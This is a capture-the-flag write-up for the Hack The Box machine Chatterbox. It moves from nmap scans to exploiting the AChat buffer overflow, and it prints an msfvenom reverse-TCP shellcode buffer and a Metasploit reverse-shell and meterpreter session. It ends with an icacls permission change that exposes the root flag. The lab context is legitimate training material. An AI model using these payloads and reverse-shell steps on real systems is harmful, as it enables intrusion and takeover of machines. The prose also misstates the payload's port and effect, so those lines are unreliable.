oxeo0/hacking-blogposts
1
0
Fork 0
mirror of http://git.nowherejezfoltodf4jiyl6r56jnzintap5vyjlia7fkirfsnfizflqd.onion/nihilist/hacking-blogposts.git synced 2025-05-16 12:27:02 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions
hacking-blogposts/Medium/18.md

565 lines
23 KiB
Markdown
Raw Blame History

---
search:
exclude: true
---
# Chatterbox Writeup
![](img/18.png)
## Introduction :
Chatterbox is a Medium windows box released back in January 2018
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nmap -F 10.10.10.74
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:11 GMT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nmap -F 10.10.10.74 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:12 GMT
Nmap scan report for 10.10.10.74
Host is up.
All 100 scanned ports on 10.10.10.74 are filtered
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nmap -F 10.10.10.74 --top-ports=30000 -vvv
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:12 GMT
Initiating Ping Scan at 08:12
Scanning 10.10.10.74 [2 ports]
Completed Ping Scan at 08:13, 3.00s elapsed (1 total hosts)
Nmap scan report for 10.10.10.74 [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nmap -F 10.10.10.74 --top-ports 30000 -vvv -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:13 GMT
Initiating Parallel DNS resolution of 1 host. at 08:13
Completed Parallel DNS resolution of 1 host. at 08:13, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 08:13
Scanning 10.10.10.74 [8320 ports]
Connect Scan Timing: About 1.86% done; ETC: 08:40 (0:27:13 remaining)
Connect Scan Timing: About 6.91% done; ETC: 08:40 (0:25:49 remaining)
Connect Scan Timing: About 11.96% done; ETC: 08:40 (0:24:25 remaining)
Connect Scan Timing: About 17.01% done; ETC: 08:40 (0:23:01 remaining)
Discovered open port 9255/tcp on 10.10.10.74
Connect Scan Timing: About 39.73% done; ETC: 08:26 (0:07:55 remaining)
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nmap -sCV -p9255 10.10.10.74 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 08:18 GMT
Nmap scan report for 10.10.10.74
Host is up (0.099s latency).
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
## **Part 2 : Getting User Access**
Our nmap scans picked up port 9255 running the http service so let's investigate it :
![](prg/18_001.png)
going to /achat we seem to get a binary file so let's download it locally and see what it says :
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ file achat
achat: empty
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ r2 achat
[0x00000000]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] find and analyze function preludes (aap)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x00000000]> afl
[0x00000000]> vvv
Seems like we have an empty application file, but let's see if radare2 shows us anything
![](prg/18_002.png)
As expected we didn't get much from that. Let's run a quick searchsploit cmd with the "Achat" arguement:
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ searchsploit Achat
------------------------------------------------------- -------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------- -------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)| exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vu| exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
------------------------------------------------------- -------------------------------
Shellcodes: No Result
Seems like we have a few interesting scripts to try, so let's pick up the first one :
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ locate 36025.py
/usr/share/exploitdb/exploits/windows/remote/36025.py
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ cp /usr/share/exploitdb/exploits/windows/remote/36025.py .
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nano 36025.py
` ![](prg/18_003.png)
once we adapted the python script correctly we grep out the msfvenom command to edit it accordingly :
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ grep msfvenom 36025.py
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
So we edit it accordingly to generate the payload we need :
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp_allports LPORT=4444 LHOST=10.10.14.11 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Here we can see that we will generate a payload that will connect back to our ip (10.10.14.11) on port 9001 spawning the calc.exe application in the process. Note also that BufferRegister=EAX indicates at which register the jump call will be, the EAX register will contain the jump call that basically points at the BEGINNING of our buffer overflow payload.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 690 (iteration=0)
x86/unicode_mixed chosen with final size 690
Payload size: 690 bytes
Final size of python file: 3365 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x38\x68\x35\x32"
buf += b"\x59\x70\x4b\x50\x6d\x30\x53\x30\x63\x59\x47\x75\x4c"
buf += b"\x71\x49\x30\x63\x34\x62\x6b\x6e\x70\x4e\x50\x64\x4b"
buf += b"\x70\x52\x7a\x6c\x34\x4b\x42\x32\x4e\x34\x72\x6b\x62"
buf += b"\x52\x4f\x38\x4c\x4f\x55\x67\x6d\x7a\x4d\x56\x70\x31"
buf += b"\x49\x6f\x66\x4c\x4f\x4c\x30\x61\x51\x6c\x49\x72\x4e"
buf += b"\x4c\x6b\x70\x55\x71\x56\x6f\x6c\x4d\x4d\x31\x45\x77"
buf += b"\x67\x72\x38\x72\x51\x42\x70\x57\x44\x4b\x31\x42\x5a"
buf += b"\x70\x54\x4b\x50\x4a\x6d\x6c\x34\x4b\x6e\x6c\x5a\x71"
buf += b"\x51\x68\x77\x73\x4e\x68\x79\x71\x46\x71\x62\x31\x44"
buf += b"\x4b\x31\x49\x4f\x30\x6d\x31\x57\x63\x52\x6b\x71\x39"
buf += b"\x6e\x38\x6a\x43\x6f\x4a\x6d\x79\x44\x4b\x70\x34\x54"
buf += b"\x4b\x5a\x61\x57\x66\x4e\x51\x4b\x4f\x36\x4c\x69\x31"
buf += b"\x78\x4f\x5a\x6d\x39\x71\x68\x47\x4c\x78\x57\x70\x74"
buf += b"\x35\x58\x76\x49\x73\x33\x4d\x49\x68\x6f\x4b\x51\x6d"
buf += b"\x6f\x34\x33\x45\x48\x64\x42\x38\x54\x4b\x70\x58\x6f"
buf += b"\x34\x6d\x31\x48\x53\x72\x46\x64\x4b\x4a\x6c\x4e\x6b"
buf += b"\x62\x6b\x71\x48\x6d\x4c\x4b\x51\x57\x63\x52\x6b\x69"
buf += b"\x74\x52\x6b\x39\x71\x36\x70\x64\x49\x71\x34\x4f\x34"
buf += b"\x6b\x74\x51\x4b\x31\x4b\x33\x31\x6e\x79\x4f\x6a\x52"
buf += b"\x31\x69\x6f\x67\x70\x61\x4f\x4f\x6f\x6e\x7a\x54\x4b"
buf += b"\x4d\x42\x78\x6b\x64\x4d\x51\x4d\x62\x48\x6f\x43\x6d"
buf += b"\x62\x39\x70\x6b\x50\x32\x48\x31\x67\x73\x43\x4d\x62"
buf += b"\x31\x4f\x51\x44\x4f\x78\x4e\x6c\x30\x77\x4d\x56\x49"
buf += b"\x77\x39\x6f\x78\x55\x37\x48\x66\x30\x5a\x61\x49\x70"
buf += b"\x69\x70\x4f\x39\x45\x74\x4e\x74\x50\x50\x61\x58\x6b"
buf += b"\x79\x53\x50\x50\x6b\x4d\x30\x69\x6f\x66\x75\x62\x30"
buf += b"\x42\x30\x72\x30\x52\x30\x6f\x50\x70\x50\x61\x30\x6e"
buf += b"\x70\x72\x48\x79\x5a\x4a\x6f\x77\x6f\x57\x70\x49\x6f"
buf += b"\x68\x55\x63\x67\x53\x38\x39\x7a\x6c\x4a\x6c\x4e\x4a"
buf += b"\x6b\x32\x48\x4d\x32\x59\x70\x7a\x71\x51\x4c\x35\x39"
buf += b"\x38\x66\x30\x6a\x4c\x50\x42\x36\x71\x47\x73\x38\x42"
buf += b"\x79\x43\x75\x72\x54\x31\x51\x4b\x4f\x49\x45\x33\x55"
buf += b"\x65\x70\x62\x54\x7a\x6f\x51\x56\x64\x4b\x51\x36\x4c"
buf += b"\x42\x31\x76\x59\x50\x6f\x50\x45\x36\x67\x70\x50\x66"
buf += b"\x34\x49\x71\x36\x4d\x32\x68\x6b\x5a\x42\x61\x5a\x79"
buf += b"\x70\x32\x4a\x69\x74\x62\x36\x6e\x77\x33\x38\x59\x72"
buf += b"\x49\x49\x66\x68\x61\x4f\x59\x6f\x48\x55\x64\x4b\x50"
buf += b"\x36\x72\x4a\x6d\x70\x53\x38\x69\x70\x4c\x50\x4b\x50"
buf += b"\x59\x70\x6e\x76\x61\x5a\x4b\x50\x62\x48\x50\x58\x63"
buf += b"\x74\x6e\x73\x38\x65\x4b\x4f\x59\x45\x76\x33\x50\x53"
buf += b"\x30\x6a\x6b\x50\x71\x46\x30\x53\x50\x57\x53\x38\x59"
buf += b"\x72\x77\x69\x47\x58\x31\x4f\x69\x6f\x76\x75\x4b\x51"
buf += b"\x59\x33\x4b\x79\x77\x56\x74\x35\x58\x6e\x37\x53\x41"
buf += b"\x41"
From there we edit the python script accordingly by pasting in the payload shellcode we generated:
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nano 36025.py
` ![](prg/18_004.png)
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ nano 36025.py
Once we're done, we set up a meterpreter handler listening on our port 4444 :
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/shell/reverse_tcp_allports
payload => windows/shell/reverse_tcp_allports
msf5 exploit(multi/handler) > set lhost 10.10.14.11
lhost => 10.10.14.11
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.11:4444
Launch the exploit and catch the incoming reverse shell connection :
λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Chatterbox]
→ python 36025.py
---->{P00F}!
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.11:4444
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.74
[*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.74:49157) at 2020-03-12 09:51:54 +0000
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>systeminfo
systeminfo
Looking at the systeminfo we see that the box has quite alot of hotfixes installed, so the privilege escalation may not be as trivial as we think :
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-223-0897461-86794
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 3/12/2020, 5:52:17 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 2 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,402 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,423 MB
Virtual Memory: In Use: 672 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
Hotfix(s): 208 Hotfix(s) Installed.
[01]: KB2849697
[02]: KB2849696
[03]: KB2841134
[04]: KB2670838
[05]: KB2830477
[06]: KB2592687
[07]: KB2479943
[08]: KB2491683
[09]: KB2506212
[10]: KB2506928
[11]: KB2509553
[12]: KB2532531
[13]: KB2533552
[14]: KB2533623
[...]
[206]: KB976902
[207]: KB982018
[208]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
now let's first upgrade our multi handler to a meterpreter shell :
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf5 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > set lhost 10.10.14.11
lhost => 10.10.14.11
msf5 post(multi/manage/shell_to_meterpreter) > set lport 8888
lport => 8888
msf5 post(multi/manage/shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.14.11:8888
Wait a bit for it to migrate :
[*] Started reverse TCP handler on 10.10.14.11:8888
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (180291 bytes) to 10.10.10.74
[*] Meterpreter session 2 opened (10.10.14.11:8888 -> 10.10.10.74:49158) at 2020-03-12 09:55:49 +0000
[*] Stopping exploit/multi/handler
And we see that it opened session 2 for us, so migrate into our second session :
msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 4008 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\alfred
Looks like we are logged in as alfred, so let's go ahead and print out his user.txt flag :
C:\Windows\system32>cd ..
cdcd ..
C:\Windows> ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\
06/10/2009 05:42 PM 24 autoexec.bat
06/10/2009 05:42 PM 10 config.sys
07/13/2009 10:37 PM <****DIR> PerfLogs
12/10/2017 02:35 PM <****DIR> Program Files
12/10/2017 10:21 AM <****DIR> Users
12/10/2017 07:42 PM <****DIR> Windows
2 File(s) 34 bytes
4 Dir(s) 17,930,084,352 bytes free
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users
12/10/2017 10:21 AM <****DIR> .
12/10/2017 10:21 AM <****DIR> ..
12/10/2017 02:34 PM <****DIR> Administrator
12/10/2017 10:18 AM <****DIR> Alfred
04/11/2011 10:21 PM <****DIR> Public
0 File(s) 0 bytes
5 Dir(s) 17,930,084,352 bytes free
C:\Users>cd Alfred
cd Alfred
C:\Users\Alfred>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users\Alfred
12/10/2017 10:18 AM <****DIR> .
12/10/2017 10:18 AM <****DIR> ..
12/10/2017 01:05 PM <****DIR> Contacts
12/10/2017 07:50 PM <****DIR> Desktop
12/10/2017 01:05 PM <****DIR> Documents
12/10/2017 01:25 PM <****DIR> Downloads
12/10/2017 01:05 PM <****DIR> Favorites
12/10/2017 01:05 PM <****DIR> Links
12/10/2017 01:05 PM <****DIR> Music
12/10/2017 01:05 PM <****DIR> Pictures
12/10/2017 01:05 PM <****DIR> Saved Games
12/10/2017 01:05 PM <****DIR> Searches
12/10/2017 01:05 PM <****DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 17,930,084,352 bytes free
C:\Users\Alfred>cd Desktop
cd Desktop
C:\Users\Alfred\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users\Alfred\Desktop
12/10/2017 07:50 PM <****DIR> .
12/10/2017 07:50 PM <****DIR> ..
12/10/2017 07:50 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 17,930,084,352 bytes free
C:\Users\Alfred\Desktop>type user.txt
type user.txt
72XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it ! we have been able to print out the user flag.
## **Part 3 : Getting Root Access**
Getting the Administrator flag is preety straightforward since we can already navigate into the Administrator folder:
C:\Users\Alfred\Desktop>cd ../..
cd ../..
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users\Administrator
12/10/2017 02:34 PM <****DIR> .
12/10/2017 02:34 PM <****DIR> ..
12/10/2017 07:08 PM <****DIR> Contacts
12/10/2017 07:50 PM <****DIR> Desktop
12/10/2017 07:08 PM <****DIR> Documents
12/10/2017 07:08 PM <****DIR> Downloads
12/10/2017 07:08 PM <****DIR> Favorites
12/10/2017 07:08 PM <****DIR> Links
12/10/2017 07:08 PM <****DIR> Music
12/10/2017 07:08 PM <****DIR> Pictures
12/10/2017 07:08 PM <****DIR> Saved Games
12/10/2017 07:08 PM <****DIR> Searches
12/10/2017 07:08 PM <****DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 18,025,164,800 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9034-6528
Directory of C:\Users\Administrator\Desktop
12/10/2017 07:50 PM <****DIR> .
12/10/2017 07:50 PM <****DIR> ..
12/10/2017 07:50 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,025,164,800 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
As expected we can't print out the Administrator's root flag. so we check the permissions since it is quite odd to be able to navigate into his folder as the user alfred:
C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop
cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
CHATTERBOX\Administrator:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CHATTERBOX\Alfred:(OI)(CI)(ID)F
Basically here we see that we already have the privileges we need to modify the permissions of all files and directories under Admin's directory. And since we are on a Windows 7 Box there is a command line tool to change file permissions :
C:\Users\Administrator\Desktop>ICACLS root.txt /grant "Users":F
ICACLS root.txt /grant "Users":F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
C:\Users\Administrator\Desktop>type root.txt
type root.txt
a6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And as you can see we have been able to print out the root flag !
## **Conclusion**
Here we can see the progress graph :
![](img/18_graph.png)
Reference in a new issue View git blame Copy permalink